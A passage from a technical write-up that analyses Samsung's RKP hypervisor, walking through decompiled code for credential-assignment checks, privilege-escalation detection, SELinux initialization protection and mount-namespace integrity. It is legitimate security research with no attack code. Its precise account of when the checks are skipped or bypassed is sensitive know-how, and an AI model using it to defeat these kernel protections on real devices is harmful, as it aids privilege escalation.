    uh_log('L', "rkp_kdp.c", 495, "\nCurrent sec_ptr is NULL  %lx %lx %lx\n ", curr_task, curr_task_va, curr_cred);
    return rkp_policy_violation("Data Protection Violation %lx %lx %lx", curr_task_va, curr_cred, 0);
  }
  // Get the back-pointer (a cred structure pointer) of the current task_security_struct.
  bp_cred_va = *(curr_secptr + 8 * rkp_cred->SEC_BP_CRED_OFFSET);
  // Get the back-pointer (a task_struct pointer) of the current cred structure.
  bp_task_va = *(curr_cred + 8 * rkp_cred->CRED_BP_TASK_OFFSET);
  // Sanity-check: the back-pointers must point to the current cred structure and current task_struct respectively.
  if (bp_cred_va != curr_cred_va || bp_task_va != curr_task_va) {
    uh_log('L', "rkp_kdp.c", 502, "\n Integrity Check failed_1  %lx %lx %lx\n ", bp_cred_va, curr_cred_va, curr_cred);
    uh_log('L', "rkp_kdp.c", 503, "\n Integrity Check failed_2 %lx %lx %lx\n ", bp_task_va, curr_task_va, curr_task);
    rkp_policy_violation("KDP Privilege Escalation %lx %lx %lx", bp_cred_va, curr_cred_va, curr_secptr);
    return;
  }
  // Sanity-check: the target RW and RO cred structures must be non NULL and the target RO cred structure must be marked
  // as `CRED` in the physmap.
  if (!targ_cred || !targ_cred_ro || rkp_phys_map_verify_cred(targ_cred_ro)) {
    uh_log('L', "rkp_kdp.c", 699, "rkp_assign_creds !! %lx %lx", targ_cred_ro, targ_cred);
    return;
  }
  skip_checks = 0;
  // Get the type field (used to process marking) from the current cred structure.
  curr_flags = *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
  // If the current task is not a "Linux on Dex" process.
  if ((curr_flags & CRED_FLAG_LOD) == 0) {
    // Get the uid, euid, gid, egid fields from the current cred structure.
    curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
    curr_euid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
    curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
    curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
    // If none of those fields have the LOD prefix (0x61a8).
    if ((curr_uid & 0xffff0000) != 0x61a80000 && (curr_euid & 0xffff0000) != 0x61a80000 &&
        (curr_gid & 0xffff0000) != 0x61a80000 && (curr_egid & 0xffff0000) != 0x61a80000) {
      // And if the device is locked.
      if (!rkp_cred->VERIFIED_BOOT_STATE) {
        // Call `rkp_check_pe` and `from_zyg_adbd` to detect instances of privilege escalation.
        if (rkp_check_pe(targ_cred, curr_cred) && from_zyg_adbd(curr_task, curr_cred)) {
          uh_log('L', "rkp_kdp.c", 717, "Priv Escalation! %lx %lx %lx", targ_cred,
                 *(targ_cred + 8 * rkp_cred->CRED_EUID_OFFSET), *(curr_cred + 8 * rkp_cred->CRED_EUID_OFFSET));
          // If both of these functions returned true, call `rkp_privilege_escalation` to handle it.
          return rkp_privilege_escalation(targ_cred, cred_pa, 1);
        }
      }
      // If the device is unlocked, or no privilege escalation was detected, skip the next checks.
      skip_checks = 1;
    }
    // If the current task has a LOD prefixed field, mark it as `CRED_FLAG_LOD`.
    else {
      *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) = curr_flags | CRED_FLAG_LOD;
    }
  }
  // If the checks are not skipped.
  if (!skip_checks) {
    // Get the uid field of the target RW cred structure.
    targ_uid = *(targ_cred + rkp_cred->CRED_UID_OFFSET);
    priv_esc = 0;
    // If the uid is not INET (3003).
    if (targ_uid != 3003) {
      // Get the uid field of the current cred structure.
      curr_uid = *(cred_pa + 4 * rkp_cred->CRED_UID_OFFSET);
      priv_esc = 0;
      // Call `check_privilege_escalation` to detect privilege escalation.
      if (check_privilege_escalation(targ_uid, curr_uid)) {
        uh_log('L', "rkp_kdp.c", 382, "\n LOD: uid privilege escalation curr_uid = %ld targ_uid = %ld \n", curr_uid,
               targ_uid);
        // If the function returns true, privilege escalation was detected.
        priv_esc = 1;
      }
    }
    // Get the euid field of the target RW cred structure.
    targ_euid = *(targ_cred + rkp_cred->CRED_EUID_OFFSET);
    // If the euid is not INET (3003).
    if (targ_euid != 3003) {
      // Get the euid field of the current cred structure.
      curr_euid = *(cred_pa + 4 * rkp_cred->CRED_EUID_OFFSET);
      // Call `check_privilege_escalation` to detect privilege escalation.
      if (check_privilege_escalation(targ_euid, curr_euid)) {
        uh_log('L', "rkp_kdp.c", 387, "\n LOD: euid privilege escalation curr_euid = %ld targ_euid = %ld \n", curr_euid,
               targ_euid);
        // If the function returns true, privilege escalation was detected.
        priv_esc = 1;
      }
    }
    // Get the gid field of the target RW cred structure.
    targ_gid = *(targ_cred + rkp_cred->CRED_GID_OFFSET);
    // If the gid is not INET (3003).
    if (targ_gid != 3003) {
      // Get the gid field of the current cred structure.
      curr_gid = *(cred_pa + 4 * rkp_cred->CRED_GID_OFFSET);
      // Call `check_privilege_escalation` to detect privilege escalation.
      if (check_privilege_escalation(targ_gid, curr_gid)) {
        uh_log('L', "rkp_kdp.c", 392, "\n LOD: Gid privilege escalation curr_gid = %ld targ_gid = %ld \n", curr_gid,
               targ_gid);
        // If the function returns true, privilege escalation was detected.
        priv_esc = 1;
      }
    }
    // Get the egid field of the target RW cred structure.
    targ_egid = *(targ_cred + rkp_cred->CRED_EGID_OFFSET);
    // If the egid is not INET (3003).
    if (targ_egid != 3003) {
      // Get the egid field of the current cred structure.
      curr_egid = *(cred_pa + 4 * rkp_cred->CRED_EGID_OFFSET);
      // Call `check_privilege_escalation` to detect privilege escalation.
      if (check_privilege_escalation(targ_egid, curr_egid)) {
        uh_log('L', "rkp_kdp.c", 397, "\n LOD: egid privilege escalation curr_egid = %ld targ_egid = %ld \n", curr_egid,
               targ_egid);
        // If the function returns true, privilege escalation was detected.
        priv_esc = 1;
      }
    }
    // If privilege escalation was detected on the UID, EUID, GID or EGID.
    if (priv_esc) {
      uh_log('L', "rkp_kdp.c", 705, "Linux on Dex Priv Escalation! %lx  ", targ_cred);
      if (curr_task) {
        curr_comm = curr_task + 8 * rkp_cred->TASK_COMM_OFFSET;
        uh_log('L', "rkp_kdp.c", 707, curr_comm);
      }
      // Call `rkp_privilege_escalation` to handle it.
      return rkp_privilege_escalation(param_cred_pa, cred_pa, 1);
    }
  }
  // The checks passed, copy the RW cred into the RO cred structure.
  memcpy(targ_cred_ro, targ_cred, rkp_cred->CRED_SIZE);
  cmd_type = cred_param->type;
  // Set the use_cnt field of the RO cred structure.
  *(targ_cred_ro + 8 * rkp_cred->CRED_USE_CNT) = cred_param->use_cnt_ptr;
  // If the caller of `prepare_ro_creds` was not `copy_creds`.
  if (cmd_type != RKP_CMD_COPY_CREDS) {
    // Get the current mm_struct from the current task_struct.
    curr_mm_va = *(current_pa + 8 * rkp_cred->TASK_MM_OFFSET);
    // If the current mm_struct is not NULL.
    if (curr_mm_va) {
      curr_mm = rkp_get_pa(curr_mm_va);
      // Extract the current PGD from it.
      curr_pgd_va = *(curr_mm + 8 * rkp_cred->MM_PGD_OFFSET);
    } else {
      // Otherwise, get it from TTBR1_EL1.
      curr_pgd_va = rkp_get_va(get_ttbr1_el1() & 0xffffffffc000);
    }
    // Set the bp_pgd and bp_task fields of the RO cred structure.
    *(targ_cred_ro + 8 * rkp_cred->CRED_BP_PGD_OFFSET) = curr_pgd_va;
    *(targ_cred_ro + 8 * rkp_cred->CRED_BP_TASK_OFFSET) = curr_task_va;
    // If the caller of `prepare_ro_creds` is `override_creds`.
    if (cmd_type == RKP_CMD_OVRD_CREDS) {
      // If the argument structure usage counter is lower or equal to 1, unmark the target RO cred as
      // `CRED_FLAG_ORPHAN`.
      if (cred_param->use_cnt <= 1) {
        *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_ORPHAN;
      }
      // Otherwise, mark the target RO cred as `CRED_FLAG_ORPHAN`.
      else {
        *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_ORPHAN;
      }
    }
  }
  // If the caller of `prepare_ro_creds` is `copy_creds`, set the bp_task field of the RO cred structure to the current
  // task_struct.
  else {
    *(targ_cred_ro + 8 * rkp_cred->CRED_BP_TASK_OFFSET) = cred_param->task_ptr;
  }
  // Get the new task_security_struct from the argument structure.
  newsec_ptr_va = cred_param->sec_ptr;
  // Get the target RO cred structure from the argument structure.
  targ_cred_ro_va = cred_param->cred_ro;
  // If the new task_security_struct is not NULL.
  if (newsec_ptr_va) {
    // Convert the new task_security_struct from a VA to a PA.
    newsec_ptr = rkp_get_pa(newsec_ptr_va);
    // Get the old task_security_struct from the target RW cred structure.
    oldsec_ptr_va = *(targ_cred + 8 * rkp_cred->CRED_SECURITY_OFFSET);
    // Convert the old task_security_struct from a VA to a PA.
    oldsec_ptr = rkp_get_pa(oldsec_ptr_va);
    // Call `chk_invalid_sec_ptr` to check if the new task_security_struct is hypervisor-protected, and ensure both the
    // old and the new task_security_struct are non NULL.
    if (chk_invalid_sec_ptr(newsec_ptr) || !oldsec_ptr || !newsec_ptr) {
      uh_log('L', "rkp_kdp.c", 594, "Invalid sec pointer [assign_secptr] %lx %lx %lx", newsec_ptr_va, newsec_ptr,
             oldsec_ptr);
      // If any of these checks fails, trigger a policy violation.
      rkp_policy_violation("Data Protection Violation %lx %lx %lx", newsec_ptr_va, oldsec_ptr, newsec_ptr);
    }
    // If the old and new task_security_struct are valid.
    else {
      // Get the new sid from the new task_security_struct.
      new_sid = *(newsec_ptr + 4);
      // Get the old sid from the old task_security_struct.
      old_sid = *(oldsec_ptr + 4);
      // If RKP is deferred initialized and the SID jumps from below to above `sysctl_net` (20).
      if (rkp_deferred_inited && old_sid < 20 && new_sid > 20) {
        uh_log('L', "rkp_kdp.c", 607, "Selinux Priv Escalation !! [assign_secptr] %lx %lx ", old_sid, new_sid);
        // Trigger a policy violation.
        rkp_policy_violation("Data Protection Violation %lx %lx %lx", old_sid, new_sid, 0);
      } else {
        // Copy the old task_security_struct to the new one.
        memcpy(newsec_ptr, oldsec_ptr, rkp_cred->SP_SIZE);
        // Set the security field of the target RO cred structure to the new task_security_struct.
        *(targ_cred_ro + 8 * rkp_cred->CRED_SECURITY_OFFSET) = newsec_ptr_va;
        // Set the bp_cred field of the new task_security_struct to the target RO cred structure.
        *(newsec_ptr + 8 * rkp_cred->SEC_BP_CRED_OFFSET) = targ_cred_ro_va;
      }
    }
  }
  // If the new task_security_struct is NULL, trigger a policy violation.
  else {
    uh_log('L', "rkp_kdp.c", 583, "Security Pointer is NULL [assign_secptr] %lx", 0);
    rkp_policy_violation("Data Protection Violation", 0, 0, 0);
  }
  // If the device is unlocked, return immediately.
  if (rkp_cred->VERIFIED_BOOT_STATE) {
    return;
  }
  // Get the type field from the RO cred structure.
  targ_flags = *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET);
  // If the target task is not marked as `CRED_FLAG_MARK_PPT`.
  if ((targ_flags & CRED_FLAG_MARK_PPT) != 0) {
    // Get the parent task_struct of the current task_struct.
    parent_task_va = *(curr_task + 8 * rkp_cred->TASK_PARENT_OFFSET);
    // Convert the parent task_struct from a VA to a PA.
    parent_task = rkp_get_pa(parent_task_va);
    // Get the parent cred structure from the parent task_struct.
    parent_cred_va = *(parent_task + 8 * rkp_cred->TASK_CRED_OFFSET);
    // Convert the parent cred structure from a VA to a PA.
    parent_cred = rkp_get_pa(parent_cred_va);
    // Get the type field from the parent cred structure.
    parent_flags = *(parent_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
    // If the parent task is marked as `CRED_FLAG_MARK_PPT`.
    if ((parent_flags & CRED_FLAG_MARK_PPT) != 0) {
      // Mark the target RO cred as `CRED_FLAG_CHILD_PPT`.
      *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_CHILD_PPT;
    }
  }
}

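Let's now go over the different functions called by rkp_assign_creds. The ones that try to detect privilege escalation are particularly interesting from a security standpoint.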

The rkp_ns_get_current function returns the current task of the kernel (stored in SP_EL0 or SP_EL1).

uint64_t rkp_ns_get_current() {
  // SPSel, Stack Pointer Select.
  //
  // SP, bit [0]: Stack pointer to use.
  if (get_sp_sel()) {
    return get_sp_el0();
  } else {
    return get_sp_el1();
  }
}

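When the device is locked, rkp_check_pe is called for processes that are not "Linux on Dex" processes. For each pair of UID, GID, EUID, and EGID of the target RW and current cred structures, it calls the check_pe_id function to determine whether this is an instance of privilege escalation. For the effective IDs, the target ID must also be lower than the current ID. Otherwise, it is not considered privilege escalation.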

bool rkp_check_pe(int64_t targ_cred, int64_t curr_cred) {
  // ...

  // Get the uid field of the current cred structure.
  curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
  // Get the uid field of the target RW cred structure.
  targ_uid = *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET);
  // Call `check_pe_id` to detect privilege escalation.
  if (check_pe_id(targ_uid, curr_uid)) {
    return 1;
  }
  // Get the gid field of the current cred structure.
  curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
  // Get the gid field of the target RW cred structure.
  targ_gid = *(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET);
  // Call `check_pe_id` to detect privilege escalation.
  if (check_pe_id(targ_gid, curr_gid)) {
    return 1;
  }
  // Get the euid field of the current cred structure.
  curr_euid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
  // Get the euid field of the target RW cred structure.
  targ_euid = *(targ_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
  // If the target euid is lower than the current one and `check_pe_id` returns true, this is privilege escalation.
  if (targ_euid < curr_euid && check_pe_id(targ_euid, curr_euid)) {
    return 1;
  }
  // Get the egid field of the current cred structure.
  curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
  // Get the egid field of the target RW cred structure.
  targ_egid = *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
  // If the target egid is lower than the current one and `check_pe_id` returns true, this is privilege escalation.
  if (targ_egid < curr_egid && check_pe_id(targ_egid, curr_egid)) {
    return 1;
  }
  return 0;
}

check_pe_id returns true if the current ID is greater than 1000 (SYSTEM) and the target ID is lower than or equal to 1000.

int64_t check_pe_id(uint32_t targ_id, uint32_t curr_id) {
  // PE is detected if the current ID is bigger than `SYSTEM` (1000) and the target ID is smaller or equal to it.
  return curr_id > 1000 && targ_id <= 1000;
}
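
To make the combined effect of these two functions more concrete, here is a minimal user-space sketch. The `ids_t` structure and the `sketch_` names are hypothetical stand-ins for the offset-based accesses of the decompiled code; only the comparison logic is meant to mirror the snippets above.

```c
#include <stdbool.h>
#include <stdint.h>

#define SYSTEM_ID 1000u /* the SYSTEM ID used as the privilege threshold */

/* Hypothetical, simplified view of the four IDs read from a cred structure. */
typedef struct {
  uint32_t uid, gid, euid, egid;
} ids_t;

/* Same predicate as check_pe_id: an unprivileged ID becoming a privileged one. */
static bool sketch_check_pe_id(uint32_t targ_id, uint32_t curr_id) {
  return curr_id > SYSTEM_ID && targ_id <= SYSTEM_ID;
}

/* Same shape as rkp_check_pe: real IDs are checked directly, effective IDs
 * additionally require the target ID to be lower than the current one. */
static bool sketch_check_pe(const ids_t* targ, const ids_t* curr) {
  if (sketch_check_pe_id(targ->uid, curr->uid)) return true;
  if (sketch_check_pe_id(targ->gid, curr->gid)) return true;
  if (targ->euid < curr->euid && sketch_check_pe_id(targ->euid, curr->euid)) return true;
  if (targ->egid < curr->egid && sketch_check_pe_id(targ->egid, curr->egid)) return true;
  return false;
}
```

With this predicate, a task running with IDs of 2000 that asks for credentials with IDs of 0 is flagged, while a task that is already at or below 1000 never is. Note that in this sketch the extra "target lower than current" comparison is already implied by the predicate itself, since a current ID above 1000 is always greater than a target ID of at most 1000.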

from_zyg_adbd is called under the same conditions as rkp_check_pe. It returns true if the current task is marked as CRED_FLAG_CHILD_PPT, or if it is a child of zygote, zygote64, or adbd.

int64_t from_zyg_adbd(int64_t curr_task, int64_t curr_cred) {
  // ...

  // Get the type field from the current cred structure.
  curr_flags = *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
  // If the current task is marked as CRED_FLAG_CHILD_PPT, return true.
  if ((curr_flags & CRED_FLAG_CHILD_PPT) != 0) {
    return 1;
  }
  // Iterate on the parents of the current task_struct.
  task = curr_task;
  while (1) {
    // Get the pid field of the parent task_struct.
    task_pid = *(task + 4 * rkp_cred->TASK_PID_OFFSET);
    // If the parent pid is zero, return false.
    if (!task_pid) {
      return 0;
    }
    // Get the comm field of the parent task_struct.
    task_comm = task + 8 * rkp_cred->TASK_COMM_OFFSET;
    // Copy the task name into a local buffer.
    memcpy(comm, task_comm, sizeof(comm));
    // If the parent task is zygote, zygote64 or adbd, return true.
    if (!strcmp(comm, "zygote") || !strcmp(comm, "zygote64") || !strcmp(comm, "adbd")) {
      return 1;
    }
    // Get the parent field of the parent task_struct.
    parent_va = *(task + 8 * rkp_cred->TASK_PARENT_OFFSET);
    // Convert the parent task_struct from a VA to a PA.
    task = parent_pa = rkp_get_pa(parent_va);
  }
}
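
The ancestor walk can be sketched in user space as follows. The `task_t` structure is a hypothetical simplification (the hypervisor reads these fields at offsets stored in rkp_cred and converts each parent pointer with rkp_get_pa), the `CRED_FLAG_CHILD_PPT` shortcut is left out, and the NULL check is an addition of this sketch.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SKETCH_COMM_LEN 16

/* Hypothetical, simplified task structure used only for this illustration. */
typedef struct task {
  uint32_t pid;
  char comm[SKETCH_COMM_LEN];
  struct task* parent;
} task_t;

/* Walk up the parent chain until a privileged ancestor or PID 0 is reached. */
static bool sketch_from_zyg_adbd(const task_t* task) {
  while (task != NULL && task->pid != 0) {
    if (!strcmp(task->comm, "zygote") || !strcmp(task->comm, "zygote64") ||
        !strcmp(task->comm, "adbd")) {
      return true;
    }
    task = task->parent;
  }
  return false;
}
```

As in the decompiled function, the walk starts at the current task itself, so a task named zygote matches as well as its descendants.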

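check_privilege_escalation is called for each pair of UID, EUID, GID, and EGID of the target RW and current cred structures. It returns true if the current ID is LOD-prefixed (0x61a8xxxx) while the target ID is not LOD-prefixed and is not equal to -1.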

bool check_privilege_escalation(int32_t targ_id, int32_t curr_id) {
  // PE is detected if the current ID is LOD prefixed but the target ID is not, and the target ID is not -1.
  return ((curr_id - 0x61a80000) <= 0xffff && (targ_id - 0x61a80000) > 0xffff && targ_id != -1);
}
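
The range check in this function uses a common idiom: subtracting the base and comparing against the range size. This only behaves as a range check when the arithmetic is unsigned, so the sketch below uses `uint32_t` throughout; that the binary performs unsigned comparisons is an assumption on our part, and the `sketch_` names are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

#define LOD_PREFIX 0x61a80000u

/* True if the ID lies in the LOD range 0x61a80000..0x61a8ffff. The unsigned
 * subtraction wraps around for smaller IDs, so one comparison covers both bounds. */
static bool sketch_is_lod_id(uint32_t id) {
  return (id - LOD_PREFIX) <= 0xffffu;
}

/* A LOD-prefixed task asking for a non-LOD ID (other than -1) is flagged. */
static bool sketch_check_privilege_escalation(uint32_t targ_id, uint32_t curr_id) {
  return sketch_is_lod_id(curr_id) && !sketch_is_lod_id(targ_id) && targ_id != UINT32_MAX;
}
```

With signed 32-bit operands, an ID such as 1000 would yield a negative difference that compares as lower than 0xffff, which is why the unsigned formulation is the one shown here.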

rkp_privilege_escalation is called when privilege escalation is detected in rkp_assign_creds. It simply triggers a policy violation.

int64_t rkp_privilege_escalation(int64_t targ_cred, int64_t curr_cred, int64_t flag) {
  uh_log('L', "rkp_kdp.c", 461, "Priv Escalation - Current %lx %lx %lx", *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET),
         *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET), *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET));
  uh_log('L', "rkp_kdp.c", 462, "Priv Escalation - Passed %lx %lx %lx", *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET),
         *(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET), *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET));
  return rkp_policy_violation("KDP Privilege Escalation %lx %lx %lx", targ_cred, curr_cred, flag);
}

The chk_invalid_sec_ptr function is called to verify that the new task_security_struct is valid (aligned on the structure size) and hypervisor-protected (marked as SEC_PTR in the physmap).

int64_t chk_invalid_sec_ptr(uint64_t sec_ptr) {
  rkp_phys_map_lock(sec_ptr);
  // The start and end addresses of the task_security_struct must be marked as `SEC_PTR` on the physmap, and it must
  // also be aligned on the size of this structure.
  if (!sec_ptr || !is_phys_map_sec_ptr(sec_ptr) || !is_phys_map_sec_ptr(sec_ptr + rkp_cred->SP_SIZE - 1) ||
      sec_ptr != sec_ptr / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE) {
    uh_log('L', "rkp_kdp.c", 186, "Invalid Sec Pointer %lx %lx %lx", is_phys_map_sec_ptr(sec_ptr), sec_ptr,
           sec_ptr - sec_ptr / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE);
    rkp_phys_map_unlock(sec_ptr);
    return 1;
  }
  rkp_phys_map_unlock(sec_ptr);
  return 0;
}
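
The alignment test in this function is written as a divide-then-multiply round trip, which is how the decompiler renders it. A small sketch, with hypothetical function names, shows that it is equivalent to the more familiar remainder test, including for sizes that are not powers of two:

```c
#include <stdbool.h>
#include <stdint.h>

/* True if addr is a multiple of size, written as in the decompiled code.
 * The integer division truncates, so the product only equals addr when
 * there is no remainder. size must be non-zero. */
static bool sketch_is_aligned_div(uint64_t addr, uint64_t size) {
  return addr == addr / size * size;
}

/* Equivalent and more common formulation using the remainder. */
static bool sketch_is_aligned_mod(uint64_t addr, uint64_t size) {
  return addr % size == 0;
}
```

The check guarantees that the pointer designates the start of a slot in the protected cache, rather than an address in the middle of another object.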

SELinux Initialization

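In addition to protecting the task_security_struct of tasks, and making the selinux_enforcing and selinux_enabled global variables read-only, Samsung RKP also protects ss_initialized. This global variable, which indicates whether SELinux has been initialized, was targeted in a previous RKP bypass. To set this variable after the policy has been loaded, the kernel calls the hypervisor in the security_load_policy function. This function calls the RKP_KDP_X60 command.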

▸ security/selinux/ss/services.c

int security_load_policy(void *data, size_t len)
{
    // ...
        uh_call(UH_APP_RKP, RKP_KDP_X60, (u64)&ss_initialized, 1, 0, 0);
    // ...
}

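On the hypervisor side, this command is handled by the rkp_cmd_selinux_initialized function, which calls rkp_selinux_initialized. This function ensures that ss_initialized is located in the kernel's rodata section, and that the kernel is setting it to 1, before performing the write.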

void rkp_selinux_initialized(saved_regs_t* regs) {
  // ...

  // Get the VA of `ss_initialized` from register x2.
  ss_initialized_va = regs->x2;
  // Get the value to set it to from register x3.
  value = regs->x3;
  // Convert the VA of `ss_initialized` to a PA.
  ss_initialized = rkp_get_pa(ss_initialized_va);
  if (ss_initialized) {
    // Ensure the `ss_initialized` is located in the kernel rodata section.
    if (ss_initialized_va < SRODATA || ss_initialized_va > ERODATA) {
      // Trigger a policy violation if it isn't.
      rkp_policy_violation("RKP_ba9b5794 %lxRKP_69d2a377%lx, %lxRKP_ba5ec51d", ss_initialized_va);
    }
    // Ensure it is located at the same address that was set in `rkp_cred_init` and provided by the kernel in
    // `kdp_init`.
    else if (ss_initialized == rkp_cred->SS_INITIALIZED_VA) {
      // The global variable can only be set to 1, never to any other value.
      if (value == 1) {
        // Perform the write on behalf of the kernel.
        *ss_initialized = value;
        uh_log('L', "rkp_kdp.c", 1199, "RKP_3a152688 %d", 1);
      } else {
        // Trigger a policy violation for other values.
        rkp_policy_violation("RKP_3ba4a93d");
      }
    }
    // Not sure what this is about. SELINUX is the PA of the selinux field of the rkp_init_t structure located on the
    // stack of the kernel function `kdp_init`. Maybe this is here to support older or future kernel versions?
    else if (ss_initialized == rkp_cred->SELINUX) {
      // The write is allowed if the new value is 1, or if the variable is not currently set to 1.
      if (value == 1 || *ss_initialized != 1) {
        // Perform the write on behalf of the kernel.
        *ss_initialized = value;
        uh_log('L', "rkp_kdp.c", 1212, "RKP_8df36e46 %d", value);
      } else {
        // Trigger a policy violation for other values.
        rkp_policy_violation("RKP_cef38ae5");
      }
    }
    // Trigger a policy violation if the address is unexpected.
    else {
      rkp_policy_violation("RKP_ced87e02");
    }
  } else {
    uh_log('L', "rkp_kdp.c", 1181, "RKP_0a7ac3b1\n");
  }
}
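
The main branch of this handler implements a "set-only" flag: the kernel may ask for the write, but only at the registered address and only with the value 1. A minimal model of that policy, in which the `sketch_policy_t` structure and function name are hypothetical and the rodata range check is omitted, could look like this:

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model of the state registered at initialization time. */
typedef struct {
  uint64_t* allowed_addr; /* the only address the flag may live at */
} sketch_policy_t;

/* Performs the write and returns true only if the request targets the
 * registered address and sets the value to 1. */
static bool sketch_set_initialized(const sketch_policy_t* policy, uint64_t* addr, uint64_t value) {
  if (addr == NULL || addr != policy->allowed_addr || value != 1) {
    return false; /* the real handler triggers a policy violation here */
  }
  *addr = value;
  return true;
}
```

Under such a policy, a compromised kernel can neither reset the flag to 0 nor reuse the command to write 1 to an arbitrary address.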

Mount Namespaces Protection

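The last feature offered by the hypervisor is the protection of the mount namespaces (the sets of file system mounts that are visible to processes).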

Kernel Structures

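The vfsmount instances, like the cred and task_security_struct structure instances, are allocated in read-only pages. This structure also gets a new field that stores a back-pointer to the mount structure that owns this instance.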

▸ include/linux/mount.h

struct vfsmount {
    // ...
    struct mount *bp_mount; /* pointer to mount*/
    // ...
} __randomize_layout;

The mount structure was also modified to contain a pointer to the vfsmount structure, instead of the structure itself.

▸ include/linux/mount.h

struct mount {
    // ...
    struct vfsmount *mnt;
    // ...
} __randomize_layout;

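In the Credentials Protection section, we explained that the security_integrity_current function is called in each SELinux security hook, and that this function calls cmp_ns_integrity to verify the integrity of the mount namespace.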

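cmp_ns_integrity retrieves the nsproxy structure of the current task (which contains pointers to all the per-process namespaces), the mnt_namespace from it, and the root mount from that structure. The integrity verification is then performed by checking that the back-pointer of the vfsmount structure points to the mount structure.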

▸ fs/namespace.c

extern u8 ns_prot;
unsigned int cmp_ns_integrity(void)
{
    struct mount *root = NULL;
    struct nsproxy *nsp = NULL;
    int ret = 0;

    if((in_interrupt()
         || in_softirq())){
        return 0;
    }
    nsp = current->nsproxy;
    if(!ns_prot || !nsp ||
        !nsp->mnt_ns) {
        return 0;
    }
    root = current->nsproxy->mnt_ns->root;
    if(root != root->mnt->bp_mount){
        printk("\n RKP44_3 Name Space Mismatch %p != %p\n nsp = %p mnt_ns %p\n",root,root->mnt->bp_mount,nsp,nsp->mnt_ns);
        ret = 1;
    }
    return ret;
}
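
The idea behind this check can be illustrated with a reduced model of the two structures. The `sketch_` types below are hypothetical and keep only the two pointers involved; in the real kernel, the vfsmount lives in a read-only page that only the hypervisor can write to.

```c
#include <stdbool.h>
#include <stddef.h>

struct sketch_mount;

/* Stand-in for vfsmount: holds the back-pointer set by the hypervisor. */
struct sketch_vfsmount {
  struct sketch_mount* bp_mount;
};

/* Stand-in for mount: lives in regular, writable kernel memory. */
struct sketch_mount {
  struct sketch_vfsmount* mnt;
};

/* Returns true when the mount and its vfsmount reference each other. */
static bool sketch_ns_integrity_ok(const struct sketch_mount* root) {
  return root != NULL && root->mnt != NULL && root->mnt->bp_mount == root;
}
```

A forged mount structure that points to a genuine vfsmount fails this test, because the back-pointer of the genuine vfsmount still designates its legitimate owner and cannot be rewritten from the kernel.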

Namespace Initialization

The vfsmount structures are allocated in the mnt_alloc_vfsmount function, using the read-only vfsmnt_cache cache. This function calls rkp_init_ns to initialize the back-pointer.

▸ fs/namespace.c

static int mnt_alloc_vfsmount(struct mount *mnt)
{
    struct vfsmount *vfsmnt = NULL;

    vfsmnt = kmem_cache_alloc(vfsmnt_cache, GFP_KERNEL);
    if(!vfsmnt)
        return 1;
    spin_lock(&mnt_vfsmnt_lock);
    rkp_init_ns(vfsmnt,mnt);
//  vfsmnt->bp_mount = mnt;
    mnt->mnt = vfsmnt;
    spin_unlock(&mnt_vfsmnt_lock);
    return 0;
}

rkp_init_ns simply calls the RKP_KDP_X52 command, passing it the vfsmount and mount instances.

▸ fs/namespace.c

void rkp_init_ns(struct vfsmount *vfsmnt,struct mount *mnt)
{
    uh_call(UH_APP_RKP, RKP_KDP_X52, (u64)vfsmnt, (u64)mnt, 0, 0);
}

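On the hypervisor side, the command is handled by the rkp_cmd_init_ns function, which calls rkp_init_ns_hyp. It calls chk_invalid_ns to verify that the new vfsmount structure is valid, before zeroing it with memset and setting its back-pointer to the mount instance.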

void rkp_init_ns_hyp(saved_regs_t* regs) {
  // ...

  // Convert the VA of the vfsmount structure into a PA.
  vfsmnt = rkp_get_pa(regs->x2);
  // Ensure the structure is valid and hypervisor-protected.
  if (!chk_invalid_ns(vfsmnt)) {
    // Reset all of its content.
    memset(vfsmnt, 0, rkp_cred->NS_SIZE);
    // Set the back-pointer to the mount structure given as argument.
    *(vfsmnt + 8 * rkp_cred->BPMNT_VFSMNT_OFFSET) = regs->x3;
  }
}

chk_invalid_ns verifies that the new vfsmount instance is valid (aligned on the structure size) and hypervisor-protected (marked as NS in the physmap).

int64_t chk_invalid_ns(uint64_t vfsmnt) {
  // The vfsmount instance must be aligned on the size of the structure.
  if (!vfsmnt || vfsmnt != vfsmnt / rkp_cred->NS_BUFF_SIZE * rkp_cred->NS_BUFF_SIZE) {
    return 1;
  }
  rkp_phys_map_lock(vfsmnt);
  // Ensure it is marked as `NS` in the physmap.
  if (!is_phys_map_ns(vfsmnt)) {
    uh_log('L', "rkp_kdp.c", 882, "Name space physmap verification failed !!!!! %lx", vfsmnt);
    rkp_phys_map_unlock(vfsmnt);
    return 1;
  }
  rkp_phys_map_unlock(vfsmnt);
  return 0;
}

Setting Fields

